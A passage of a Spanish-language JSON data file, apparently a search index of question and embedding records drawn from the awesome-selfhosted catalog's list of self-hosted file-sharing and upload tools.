-0.01805, -0.00306, 0.06726, -0.02541, -0.01952, 0.0576, -0.11717, 0.08064, 0.0127, 0.06233, 0.04915, 0.11961, 0.07894, 0.03515, -0.06177, -0.02846, 0.04929, -0.08845, -0.06892, -0.01787, -0.03162, -0.05123, 0.01757, 0.04681, 0.01954, 0.00437, -0.06681, 0.04512, 0.11114, -0.05325, 0.0633, -0.02449, 0.00499, 0.02729, 0.03503, -0.03348, -0.07478, -0.00723, 0.00802, 0.02501, 0.01475, -0.06418, -0.04931, -0.0219, 0.00452, 0.09255, 0.02071, -0.06309, 0.04812, 0.11188, 0.04152, 0.00431, -0.03681, 0.10459, -0.00887, 0.00608, 0.0025, -0.01702, 0.07771, 0.00464, -0.01247, -0.01876, 0.01776, 0.02199, 0.06862, 0.02624, -0.02818, 0.01196, 0.02439, 0.01371, -0.03042, -0.00405, -0.00735, 0.02046, -0.02287, 0.05189, -0.03574, -0.03619, -0.02488, 0.02913, -0.05747, -0.06239, 0.08022, 0.0219, 0.01913, -0.09342, 0.02026, -0.09156, 0.03516, -0.01047, -0.04362, -0.05643, 0.02902, 0.02284, -0.01124, 0.00752, 0.04816]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: Gokapi β€” Lightweight server to share files, which expire after a set amount of downloads or days. Similar to the discontinued Firefox Send, with the difference that only the admin is allowed to upload files [GPL-3.0, Go/Docker]. goploader β€” Easy file sharing with server-side encryption, curl/httpie/wget compliant [MIT, Go]. GoSƐ β€” Modern file-uploader focusing on scalability and simplicity. It only depends on a S3 storage backend and hence scales horizontally without the need for additional databases or caches [Apache-2.0, Go/Docker]. Jirafeau β€” One-click-fileshare project. Select your file, upload, and share a link. That's it [AGPL-3.0, PHP/Docker]. OnionShare β€” Securely and anonymously share a file of any size [GPL-3.0, Python/deb]. PicoShare β€” Minimalist, easy-to-host service for sharing images and other files [AGPL-3.0, Go/Docker]. Picsur β€” Simple imaging hosting platform that allows you to easily host, edit, and share images [AGPL-3.0, Docker].", "indexar": "con quΓ© herramienta puedo subir imΓ‘genes a un servidor sin necesidad de bases de datos complejas?", "v": [-0.03291, 0.12436, -0.17727, -0.17485, -0.05166, -0.1678, -0.04281, -0.10784, -0.02006, -0.04459, -0.10245, -0.08691, -0.0766, -0.11428, 0.00613, 0.01938, 0.07761, -0.1364, 0.00071, -0.02711, 0.0915, -0.00845, -0.01139, -0.04479, -0.15278, -0.01773, 0.05115, 0.01153, -0.14797, 0.02033, -0.02805, 0.02323, 0.01217, 0.05173, -0.06948, -0.03415, -0.08441, 0.08672, -0.08581, -0.06033, -0.02821, 0.01058, -0.10196, 0.05062, 0.00525, -0.00926, -0.07311, -0.02277, 0.05705, -0.02732, -0.02821, -0.04801, -0.11022, -0.06945, -0.08152, -0.13099, 0.18909, -0.1648, 0.07564, -0.0213, -0.11772, 0.0898, -0.02923, -0.01736, 0.00607, -0.01627, -0.00279, -0.02375, -0.05651, 0.02571, -0.02601, 0.05255, 0.00911, -0.07807, 0.04544, -0.02974, 0.02754, -0.06706, -0.07024, 0.03205, 0.01511, 0.05702, -0.11702, 0.137, -0.14032, -0.07251, 0.04922, 0.00198, 0.07794, -0.05192, 0.11477, 0.08002, 0.00198, 0.04383, 0.07793, 0.01986, 0.04291, -0.06595, 0.04618, 0.01118, 0.06396, -0.00521, -0.03247, 0.03534, 0.0187, 0.11106, 0.14309, -0.08911, -0.07353, -0.05903, 0.0513, -0.03305, 0.00372, -0.0354, -0.0691, -0.04682, -0.01501, -0.02503, -0.02205, 0.01319, 0.09113, -0.01281, 0.05643, -0.02989, 0.01811, -0.04653, -0.01392, 0.10697, -0.00712, -0.05495, -0.07955, -0.02201, -0.07184, -0.01675, 0.02641, 0.01087, 0.06714, -0.13002, -0.05702, -0.14298, -0.03832, 0.06194, -0.09148, -0.10161, 0.06774, 0.02882, 0.03978, -0.04479, -0.13036, 0.01668, 0.0356, -0.02237, 0.04221, 0.04539, -0.02725, 0.02552, 0.00118, -0.0897, -0.08258, 0.01519, -0.02959, 0.04863, 0.04125, 0.07883, -0.03126, -0.06136, -0.01023, 0.00507, 0.0413, 0.08566, -0.04821, 0.00549, 0.01196, -0.07515, 0.05287, -0.04265, -0.09441, -0.08736, -0.06393, 0.00319, -0.01155, -0.00276, -0.0049, 0.00045, -0.00307, -0.0722, -0.0392, -0.05153, 0.01714, -0.01387, -0.02394, 0.05775, -0.02849, -0.00117, 0.09109, -0.08597, -0.05801, 0.00286, 0.04424, -0.00797, -0.02865, -0.01911, -0.03943, -0.02519, -0.0152, 0.0115, -0.02275, 0.01933, 0.02289, -0.02071, -0.02645, -0.00073, 0.04359, -0.08374, 0.01372, -0.04298, 0.05109, -0.00716, -0.05349, -0.01922, -0.02287, 0.07355, 0.06712, 0.01846, -0.00512, 0.05237, -0.00312, 0.01839, 0.03595, -0.0445, -0.01021, 0.04503, -0.00855, 0.0051, 0.03582, -0.03151, -0.01248, -0.04743, -0.05067, -0.07823, 0.02772, 0.08954, -0.02171, -0.05742, -0.05038, -0.05539, -0.03812, -0.00779, -0.01707, -0.10465, -0.02849, -0.03989, 0.04265, -0.04646, -0.00647, -0.04776]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: Gokapi β€” Lightweight server to share files, which expire after a set amount of downloads or days. Similar to the discontinued Firefox Send, with the difference that only the admin is allowed to upload files [GPL-3.0, Go/Docker]. goploader β€” Easy file sharing with server-side encryption, curl/httpie/wget compliant [MIT, Go]. GoSƐ β€” Modern file-uploader focusing on scalability and simplicity. It only depends on a S3 storage backend and hence scales horizontally without the need for additional databases or caches [Apache-2.0, Go/Docker]. Jirafeau β€” One-click-fileshare project. Select your file, upload, and share a link. That's it [AGPL-3.0, PHP/Docker]. OnionShare β€” Securely and anonymously share a file of any size [GPL-3.0, Python/deb]. PicoShare β€” Minimalist, easy-to-host service for sharing images and other files [AGPL-3.0, Go/Docker]. Picsur β€” Simple imaging hosting platform that allows you to easily host, edit, and share images [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a los servicios de envΓ­o de archivos que se autodestruyen?", "v": [-0.04246, -0.01373, -0.07143, -0.05607, -0.06998, -0.01662, -0.05085, -0.07339, -0.20589, -0.02003, -0.17112, -0.26285, -0.06619, 0.03235, 0.09672, -0.09469, 0.1902, -0.10825, 0.18402, 0.02118, -0.07963, 0.00657, -0.07261, -0.02995, -0.09293, -0.01251, 0.03515, 0.03987, -0.17179, 0.03332, 0.06256, -0.01198, 0.14398, -0.03564, -0.00475, 0.01551, 0.1512, 0.186, 0.00216, 0.03156, 0.03397, -0.12913, -0.04089, 0.11317, -0.09147, -0.06671, 0.01778, 0.0399, -0.03272, 0.07054, -0.02779, -0.10417, -0.06749, 0.01527, 0.00788, 0.00384, 0.07794, -0.16386, -0.03655, -0.0304, -0.03585, 0.09673, 0.01626, 0.04826, 0.00633, -0.04614, -0.06545, 0.01707, -0.1262, 0.05226, 0.06668, -0.01062, 0.06387, -0.02224, -0.08966, 0.03859, -0.10706, 0.04475, -0.11352, 0.14597, 0.10904, -0.02255, 0.01654, 0.00737, -0.00225, -0.02628, -0.00385, -0.01745, 0.04696, 0.04412, 0.02516, 0.01486, -0.02685, 0.13289, -0.0952, -0.0027, 0.04194, -0.00954, 0.0051, 0.03735, 0.09058, 0.03774, -0.023, 0.03782, 0.07713, -0.00167, -0.03028, 0.08816, -0.00036, -0.03091, 0.08006, 0.04157, 0.05166, 0.02737, -0.06, -0.11461, -0.03658, 0.07345, -0.02882, 0.03148, -0.05089, 0.05483, 0.03577, -0.04227, -0.00012, -0.02986, 0.00779, 0.0278, -0.06003, 0.04366, 0.09725, -0.04941, -0.08283, -0.05326, -0.02964, -0.06728, 0.07885, -0.01134, 0.01078, 0.02111, 0.11164, 0.02792, -0.01559, -0.0136, 0.05483, -0.04636, -0.01116, -0.05148, -0.0066, -0.09406, -0.06313, -0.00277, 0.04454, 0.04585, 0.01919, 0.04722, -0.04685, -0.0719, 0.00569, 0.01744, 0.01357, 0.03502, 0.00092, 0.04534, -0.0739, -0.00382, 0.03612, -0.01049, -0.05882, -0.0798, 0.03262, 0.05367, 0.02713, -0.0595, -0.00186, -0.01123, -0.01267, -0.11164, 0.00305, -0.02534, 0.03201, 0.02216, -0.09301, 0.027, -0.00387, -0.0145, -0.01369, -0.04146, 0.04083, 0.01495, -0.05713, 0.00185, -0.09207, -0.0228, -0.03472, -0.0028, -0.0925, -0.02022, -0.0518, -0.02732, -0.05894, -0.03825, -0.02859, 0.01581, -0.05515, -0.04422, -0.01812, 0.03782, 0.0243, 0.04983, 0.04646, 0.03378, 0.13519, -0.04311, -0.02051, -0.01641, 0.00779, 0.00096, -0.02056, -0.02358, 0.04122, 0.01717, 0.01239, -0.00262, -0.06634, 0.02443, 0.04656, 0.03745, 0.006, -0.00456, 0.00197, 0.01107, -0.04335, 0.03242, 0.04285, -0.00279, 0.03382, -0.02112, 0.02503, -0.0204, 0.05244, 0.07058, -0.04472, 0.01004, -0.01245, -0.00351, -0.03888, -0.02584, 0.00102, -0.00484, 0.01212, 0.06637, -0.02156, 0.02497, 0.08729, 0.02583]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: PictShare β€” Multi lingual image hosting service with a simple resizing and upload API [Apache-2.0, PHP/Docker]. Pingvin Share X β€” File sharing platform with support for logins, reverse shares, share expiry, S3 Buckets, advanced authentication, ClamAV for security scans and more (fork of Pingvin Share) [BSD-2-Clause, Docker/Nodejs]. Plik β€” Scalable and friendly temporary file upload system [MIT, Go/Docker]. ProjectSend β€” Upload files and assign them to specific clients you create. Give access to those files to your clients [GPL-2.0, PHP]. PsiTransfer β€” Simple file sharing solution with robust up-/download-resume and password protection [BSD-2-Clause, Nodejs]. QuickShare β€” Quick and simple file sharing between different devices [LGPL-3.0, Docker/Go]. Safebucket β€” File sharing platform with pluggable infrastructure, where uploads and downloads go directly between clients and S3-compatible storage [Apache-2.0, Go/Docker].", "indexar": "que programa sirve para compartir archivos de forma rΓ‘pida entre dispositivos diferentes?", "v": [0.0289, 0.13245, -0.15476, -0.27489, 0.00857, -0.14554, -0.02106, -0.07669, 0.03278, -0.08514, -0.00962, -0.11876, -0.02331, -0.11093, 0.06578, -0.05123, 0.13377, -0.08784, 0.09638, -0.03278, 0.00219, 0.04412, -0.05125, -0.08272, -0.05057, 0.0017, 0.07141, 0.08052, -0.17313, 0.01892, 0.02235, -0.02576, 0.08321, -0.04951, -0.14125, -0.01124, 0.07539, 0.04979, -0.12498, 0.02011, -0.03534, 0.02965, -0.04328, 0.03021, 0.03214, -0.01031, -0.02685, 0.01037, 0.01748, 0.02863, -0.03666, 0.07495, -0.00152, 0.0868, -0.10955, -0.10184, 0.01073, -0.22759, -0.02534, -0.00505, -0.05363, -0.01645, -0.07487, -0.09009, 0.00585, 0.02447, -0.03765, 0.07995, -0.14571, 0.00035, 0.01538, 0.00791, 0.07749, -0.01032, -0.05308, 0.11542, -0.09131, -0.00906, 0.00805, -0.02839, 0.09419, -0.00666, 0.06437, 0.00128, -0.01978, 0.00338, 0.06862, 0.02075, -0.02102, -0.00836, 0.03055, 0.06022, 0.0413, 0.03656, 0.02706, -0.07106, 0.07711, 0.06608, 0.04737, 0.03437, 0.07235, -0.02148, -0.09815, 0.09576, -0.09145, 0.117, 0.00604, 0.0284, -0.00011, -0.01569, 0.05713, 0.01645, 0.04787, 0.03201, -0.11877, 0.02919, -0.00822, -0.08131, 0.02131, -0.02344, -0.05919, 0.03781, 0.0009, 0.01751, 0.15399, 0.02034, -0.02919, 0.09056, -0.04861, 0.11791, 0.09452, 0.00349, -0.01191, 0.03141, -0.08792, -0.09598, 0.06541, 0.01086, -0.01686, -0.09566, 0.14968, 0.03772, -0.00469, -0.0163, 0.03103, -0.00989, 0.07623, -0.03797, 0.01544, -0.01653, -0.04032, -0.00715, -0.05389, -0.07505, -0.0924, -0.01636, -0.01688, -0.10163, -0.13133, 0.06116, -0.09518, 0.02856, -0.03333, -0.02233, -0.01261, -0.10483, 0.01053, 0.01369, 0.12927, 0.03996, -0.01283, 0.09109, 0.0259, -0.03507, -0.03356, 0.07563, -0.02994, -0.0521, 0.06397, -0.05078, -0.09523, 0.04251, 0.00166, 0.05433, -0.00993, -0.04568, -0.01615, 0.0698, -0.02574, 0.03958, 0.02226, 0.02413, 0.01565, 0.0216, -0.01519, -0.05965, -0.05998, -0.00516, 0.02483, 0.01084, -0.05689, -0.04753, -0.00579, 0.03136, 0.02244, 0.05156, -0.02783, -0.01022, 0.08452, 0.0514, -0.00465, -0.01018, 0.08914, -0.01001, -0.01106, -0.03937, -0.00215, 0.04705, 0.079, 0.0028, 0.02698, -0.00919, 0.00418, 0.03716, 0.00973, 0.00701, -0.00061, 0.00736, -0.00856, -0.07215, 0.00641, -0.02477, 0.02696, -0.02279, 0.0553, -0.00197, -0.01208, -0.04586, 0.007, -0.05396, -0.04323, 0.05272, 0.02881, -0.00122, -0.07686, 0.02461, -0.05867, -0.02884, -0.00932, -0.04104, -0.03632, 0.06437, 0.04449, 0.01536, 0.00048, 0.05445]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: PictShare β€” Multi lingual image hosting service with a simple resizing and upload API [Apache-2.0, PHP/Docker]. Pingvin Share X β€” File sharing platform with support for logins, reverse shares, share expiry, S3 Buckets, advanced authentication, ClamAV for security scans and more (fork of Pingvin Share) [BSD-2-Clause, Docker/Nodejs]. Plik β€” Scalable and friendly temporary file upload system [MIT, Go/Docker]. ProjectSend β€” Upload files and assign them to specific clients you create. Give access to those files to your clients [GPL-2.0, PHP]. PsiTransfer β€” Simple file sharing solution with robust up-/download-resume and password protection [BSD-2-Clause, Nodejs]. QuickShare β€” Quick and simple file sharing between different devices [LGPL-3.0, Docker/Go]. Safebucket β€” File sharing platform with pluggable infrastructure, where uploads and downloads go directly between clients and S3-compatible storage [Apache-2.0, Go/Docker].", "indexar": "cual es una alternativa libre a los servicios de alojamiento de imΓ‘genes con redimensionamiento automΓ‘tico?", "v": [-0.01503, 0.11751, -0.1168, -0.13117, -0.10525, 0.01025, -0.11259, -0.0594, -0.17477, -0.08371, -0.07126, -0.2928, -0.03617, -0.07597, 0.06034, -0.04055, 0.10364, -0.12025, 0.0685, 0.03735, -0.03129, -0.00413, -0.10007, 0.02229, 0.00218, -0.06322, 0.06598, -0.00361, -0.17027, 0.00299, 0.09926, 0.00699, 0.01777, -0.04186, -0.06831, -0.03778, 0.13359, 0.09038, 0.0126, -0.08497, 0.03102, -0.06958, -0.02764, 0.13144, -0.01568, -0.04376, -0.0654, 0.06476, -0.01583, -0.019, -0.03708, 0.00443, -0.04413, 0.03933, 0.06331, -0.06805, 0.19608, -0.05973, -0.03305, -0.04166, 0.00523, 0.12292, -0.03643, 0.0657, 0.06109, 0.03189, -0.08476, 0.04198, -0.0667, -0.00676, 0.04591, -0.03419, 0.04471, -0.01068, -0.07628, 0.0197, -0.08385, -0.0581, -0.10428, -0.0315, -0.00155, 0.02123, -0.09881, 0.03641, -0.07684, -0.02198, -0.02459, -0.13983, 0.00662, -0.01734, 0.06857, 0.01112, 0.0537, 0.13431, -0.05304, -0.02547, 0.0667, 0.07636, 0.03629, -0.00529, 0.10878, -0.00072, -0.09157, 0.03557, 0.07686, -0.01664, 0.03847, -0.06067, -0.12588, -0.05623, 0.09387, 0.04288, 0.0161, -0.06932, -0.11077, -0.10175, -0.0682, -0.0315, 0.08313, 0.00343, -0.01555, 0.00947, 0.05291, -0.00479, 0.01776, 0.06426, 0.01212, 0.02498, -0.05175, -0.01678, 0.04699, 0.01214, -0.09462, -0.08766, -0.03073, -0.03986, 0.10815, -0.02871, 0.05678, -0.05199, -0.03963, 0.03076, 0.04095, -0.0536, 0.01648, -0.02658, 0.04442, -0.04815, -0.08008, 0.07672, -0.05236, 0.052, 0.06887, 0.03379, 0.01222, 0.09785, -0.11009, -0.078, -0.0581, 0.0453, -0.00692, -0.04256, 0.06471, 0.0753, -0.02759, -0.00041, -0.00754, -0.09917, -0.07858, 0.04666, -0.01887, -0.00153, -0.02526, -0.02356, 0.04225, 0.02532, -0.04675, -0.11107, -0.02077, -0.0444, 0.02539, 0.0206, -0.07977, 0.01127, 0.0189, -0.01492, -0.03456, 0.02533, -0.00302, -0.07582, -0.0554, 0.02349, -0.06179, -0.01107, 0.02389, -0.04257, -0.07361, 0.00641, 0.03632, -0.04168, -0.07465, -0.00855, -0.05676, 0.00988, -0.08357, -0.02871, 0.0047, 0.11588, -0.04856, 0.03693, -0.01184, 0.00804, 0.10368, -0.05326, -0.0502, -0.00442, 0.02821, -0.05111, -0.05186, -0.00918, -0.00693, 0.03287, 0.01517, 0.00162, -0.00499, 0.01526, 0.03024, 0.079, -0.00896, -0.00796, -0.00739, 0.09577, -0.03686, -0.00081, 0.02001, -0.00704, 0.04283, -0.00988, -0.01205, -0.06371, 0.07561, 0.02642, -0.04079, 0.02599, -0.00858, -0.01385, -0.03176, -0.01892, 0.02909, -0.04491, 0.02232, 0.05299, -0.01105, -0.0161, 0.0312, 0.01366]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: PictShare β€” Multi lingual image hosting service with a simple resizing and upload API [Apache-2.0, PHP/Docker]. Pingvin Share X β€” File sharing platform with support for logins, reverse shares, share expiry, S3 Buckets, advanced authentication, ClamAV for security scans and more (fork of Pingvin Share) [BSD-2-Clause, Docker/Nodejs]. Plik β€” Scalable and friendly temporary file upload system [MIT, Go/Docker]. ProjectSend β€” Upload files and assign them to specific clients you create. Give access to those files to your clients [GPL-2.0, PHP]. PsiTransfer β€” Simple file sharing solution with robust up-/download-resume and password protection [BSD-2-Clause, Nodejs]. QuickShare β€” Quick and simple file sharing between different devices [LGPL-3.0, Docker/Go]. Safebucket β€” File sharing platform with pluggable infrastructure, where uploads and downloads go directly between clients and S3-compatible storage [Apache-2.0, Go/Docker].", "indexar": "con que puedo montar una plataforma segura donde los usuarios suban y descarguen archivos directamente sin pasar por un servidor central?", "v": [-0.11721, -0.05886, -0.13836, -0.18492, -0.18849, -0.17124, -0.014, -0.14108, -0.07261, -0.12507, -0.12494, -0.05226, 0.08948, -0.02453, 0.0209, 0.08187, 0.04814, -0.03385, 0.11347, 0.03722, 0.03242, -0.00038, 0.05917, -0.11025, -0.02857, -0.03669, 0.03576, -0.09597, -0.13312, -0.03856, 0.02442, 0.00766, 0.06368, 0.07864, -0.01096, -0.12859, 0.01788, 0.09046, -0.01775, 0.04616, -0.00594, -0.02452, -0.06904, -0.02794, 0.02599, 0.01868, 0.03375, -0.07896, 0.07581, -0.06512, -0.089, -0.1418, -0.1797, 0.02323, -0.07779, -0.01393, 0.06446, -0.05354, 0.16459, -0.01517, -0.16584, 0.09905, 0.02814, 0.04703, 0.0523, 0.04864, -0.03705, 0.04551, -0.14331, 0.02659, 0.02857, 0.04594, 0.0215, -0.01737, 0.04062, 0.00279, -0.00085, -0.03779, 0.00758, 0.09099, 0.05994, 0.05401, 0.00461, 0.11395, -0.06385, -0.07334, 0.01972, -0.06391, 0.02427, 0.01658, 0.10044, 0.00609, 0.01064, 0.0228, -0.02978, -0.13324, 0.12458, -0.07446, -0.03642, -0.08661, 0.00012, 0.04212, 0.00517, 0.12772, 0.05, -0.01178, 0.08689, -0.03721, 0.02633, -0.09384, 0.11397, 0.02479, -0.00263, 0.0207, -0.09345, 0.00683, -0.08834, 0.06174, 0.0439, 0.05585, -0.02394, 0.00105, 0.04887, -0.07965, 0.07946, 0.0231, 0.07675, 0.07336, -0.07325, -0.0168, -0.01075, -0.05349, -0.07629, 0.01216, -0.02148, -0.0389, 0.04887, -0.00415, -0.04937, -0.0125, 0.06029, 0.01019, -0.0002, -0.05362, 0.14082, -0.01733, 0.0583, -0.10506, -0.0279, -0.01489, -0.05258, 0.05157, -0.01531, -0.01466, -0.07644, 0.00144, 0.05329, -0.09598, -0.05056, 0.05399, 0.01429, 0.05149, -0.03361, 0.04864, -0.03629, -0.01607, -0.03242, 0.04857, 0.03901, 0.00567, 0.02873, 0.08978, 0.03523, -0.11786, 0.08873, 0.03454, -0.0418, -0.04771, 0.05058, -0.01166, -0.06557, -0.03911, -0.03829, 0.03458, -0.07374, -0.04116, 0.03992, 0.00187, -0.01394, 0.09206, -0.02978, 0.04083, -0.03947, 0.06455, 0.00614, -0.08221, -0.06562, 0.03607, -0.02335, -0.02822, -0.03786, -0.00383, -0.03121, -0.01751, -0.0028, -0.03766, -0.03214, 0.03099, 0.0273, 0.0172, -0.01914, -0.04343, 0.071, -0.06833, 0.01684, -0.01514, 0.09118, -0.02311, -0.03007, -0.01092, -0.0343, 0.04913, 0.0337, 0.02054, 0.00495, 0.04676, 0.00835, 0.00186, 0.02806, -0.01449, -0.05759, 0.02646, -0.04147, -0.00911, 0.0246, -0.018, 0.01978, 0.00352, -0.06058, -0.06292, -0.01394, 0.11024, 0.00495, -0.02133, 0.00976, -0.05476, -0.05184, 0.02063, -0.01372, -0.05397, -0.03572, -0.01553, 0.05151, 0.00054, -0.0154, -0.03003]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: sE2EEnd β€” End-to-end encrypted file sharing with password protection, download limits, and auto-expiration, integrated with Keycloak for authentication [AGPL-3.0, Docker]. Sharry β€” Share files easily over the internet between authenticated and anonymous users (both ways) with resumable up- and downloads [GPL-3.0, Scala/Java/deb/Docker]. Shifter β€” A simple, self-hosted file-sharing web app, powered by Django [MIT, Docker]. Slink β€” Image sharing platform designed to give users complete control over their media sharing experience [AGPL-3.0, Docker]. snowshare β€” File and link sharing platform with URL shortening, code snippet sharing, and file uploads, featuring customizable expiration, privacy settings, and QR codes [CC0-1.0, Nodejs/Docker]. transfer.sh β€” Easy file sharing from the command line [MIT, Go]. Uguu β€” Stores files and deletes after X amount of time [MIT, PHP].", "indexar": "quΓ© herramienta sirve para compartir archivos de forma segura sin necesidad de servidores complejos?", "v": [0.007, -0.0008, -0.17919, -0.22142, 0.04959, -0.23612, -0.061, -0.1607, 0.00932, -0.08342, -0.05174, 0.00412, 0.09141, -0.12286, 0.10673, 0.0097, 0.16018, -0.10888, 0.01833, 0.08228, 0.02556, 0.00601, -0.03258, -0.06399, -0.13876, -0.03475, 0.07367, 0.01821, -0.14324, 0.08785, -0.01147, 0.02313, 0.07168, -0.02988, -0.06654, 0.03734, -0.11531, 0.13245, -0.09857, 0.03691, -0.00426, 0.07316, -0.04784, 0.0703, -0.05023, 0.01122, -0.01938, -0.02308, 0.06312, 0.02895, -0.13009, -0.10528, -0.09159, -0.04715, -0.05761, -0.08763, 0.06502, -0.16689, 0.04442, -0.00199, -0.21181, 0.07891, -0.04205, -0.00261, 0.01138, -0.06953, -0.02006, -0.0223, -0.13455, 0.01471, -0.07887, -0.01985, 0.00816, -0.01101, -0.08123, -0.00331, -0.0222, -0.03895, 0.0147, 0.08445, 0.09899, 0.07904, -0.03142, -0.00914, -0.08695, -0.10178, 0.05422, 0.02368, 0.02729, -0.03171, 0.01474, 0.04251, -0.01925, 0.01339, 0.00087, -0.00386, 0.12132, -0.03448, -0.01933, -0.0184, 0.0851, -0.02914, -0.00363, 0.03695, -0.0502, 0.05454, 0.0066, -0.00301, 0.01691, -0.08272, 0.1125, 0.01395, 0.03387, 0.08082, -0.03721, 0.07216, -0.00505, -0.01521, -0.01028, -0.00216, 0.04634, 0.07321, -0.00154, -0.05711, 0.05059, -0.03664, 0.02518, 0.08733, -0.03153, -0.07671, -0.00748, -0.05002, -0.12311, 0.04126, -0.05174, -0.04855, 0.13992, -0.08251, -0.06241, -0.08949, 0.01309, 0.02917, -0.05292, -0.08309, 0.04908, 0.0336, 0.1205, -0.0342, -0.04634, -0.0646, -0.02328, -0.05121, -0.03522, -0.06536, -0.06644, -0.0108, -0.00334, -0.08243, -0.11272, 0.02831, -0.00596, 0.00538, 0.03577, 0.07442, 0.02725, -0.06628, 0.02366, 0.02885, 0.06904, 0.03102, 0.05918, -0.02901, 0.05478, -0.06166, -0.05944, -0.01032, -0.11205, -0.01381, 0.01976, -0.03715, -0.03285, -0.00509, -0.04411, 0.03382, -0.02241, -0.07881, 0.01161, -0.00537, -0.02521, 0.02516, 0.01089, 0.00528, -0.03476, -0.02747, 0.02225, -0.04066, -0.04696, -0.04748, 0.02797, -0.01333, 0.00118, -0.0723, -0.03146, 0.00018, 0.03518, 0.04146, -0.06628, 0.01749, 0.03772, 0.02916, 0.03479, 0.00882, 0.0733, -0.04954, 0.0238, -0.05048, 0.02048, 0.04352, 0.00424, 0.02216, 0.0105, -0.01373, 0.01594, -0.02804, 0.00808, 0.06116, -0.02218, 0.00412, 0.00787, -0.04316, 0.02068, 0.02302, -0.03366, 0.036, 0.02624, -0.0544, 0.00237, -0.03178, -0.03009, -0.07008, -0.01677, 0.09144, -0.01508, -0.04872, -0.0467, -0.08182, -0.02793, -0.01031, -0.0247, -0.05821, -0.02405, 0.00207, 0.02183, 0.0292, -0.0037, -0.0323]} -{"tipo": "pregunta", "herramienta": "File Transfer - Single-click & Drag-n-drop Upload", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload", "tema": "file transfer - single-click & drag-n-drop upload", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / File Transfer - Single-click & Drag-n-drop Upload: sE2EEnd β€” End-to-end encrypted file sharing with password protection, download limits, and auto-expiration, integrated with Keycloak for authentication [AGPL-3.0, Docker]. Sharry β€” Share files easily over the internet between authenticated and anonymous users (both ways) with resumable up- and downloads [GPL-3.0, Scala/Java/deb/Docker]. Shifter β€” A simple, self-hosted file-sharing web app, powered by Django [MIT, Docker]. Slink β€” Image sharing platform designed to give users complete control over their media sharing experience [AGPL-3.0, Docker]. snowshare β€” File and link sharing platform with URL shortening, code snippet sharing, and file uploads, featuring customizable expiration, privacy settings, and QR codes [CC0-1.0, Nodejs/Docker]. transfer.sh β€” Easy file sharing from the command line [MIT, Go]. Uguu β€” Stores files and deletes after X amount of time [MIT, PHP].", "indexar": "con quΓ© puedo subir y descargar archivos fΓ‘cilmente entre personas autenticadas y anΓ³nimas?", "v": [0.05979, 0.19098, -0.07765, 0.02856, 0.04659, 0.00755, -0.06284, -0.06897, -0.17208, -0.00375, -0.10466, -0.15313, -0.04205, 0.00916, -0.00188, -0.05043, 0.08365, 0.0735, 0.1208, 0.07592, 0.10838, -0.07281, -0.05858, -0.16746, -0.00392, -0.11865, 0.07062, 0.1232, 0.04432, -0.09306, 0.00676, 0.06339, 0.00992, 0.13134, -0.02652, 0.06697, 0.01192, 0.05548, 0.02527, -0.07486, 0.06528, 0.02835, -0.04441, 0.03919, 0.02711, -0.03268, 0.01548, -0.00365, 0.02976, -0.05308, -0.05624, -0.04333, -0.05474, -0.08165, -0.17533, -0.0193, 0.0792, -0.12754, 0.06792, 0.03759, -0.02578, 0.18042, 0.01989, 0.02103, -0.01124, -0.01317, 0.03496, 0.00796, -0.13429, 0.03296, 0.03188, 0.07405, 0.00693, 0.11477, 0.06027, 0.00785, -0.08211, -0.1317, -0.02615, 0.05998, 0.07478, -0.0758, 0.03465, 0.09402, -0.04647, -0.05989, -0.0262, -0.02642, 0.06154, -0.00926, 0.16092, -0.05181, 0.07156, -0.09295, 0.01308, -0.00593, 0.01669, 0.00699, -0.06162, -0.03247, -0.08517, -0.02099, 0.0275, 0.15374, 0.07132, 0.08041, -0.0725, -0.03572, 0.01552, -0.0469, 0.02114, -0.00102, -0.01426, 0.09405, -0.01313, -0.00754, -0.07155, -0.101, -0.022, -0.05446, -0.04791, -0.05904, 0.00948, -0.07537, 0.02622, -0.06144, 0.04156, 0.13679, 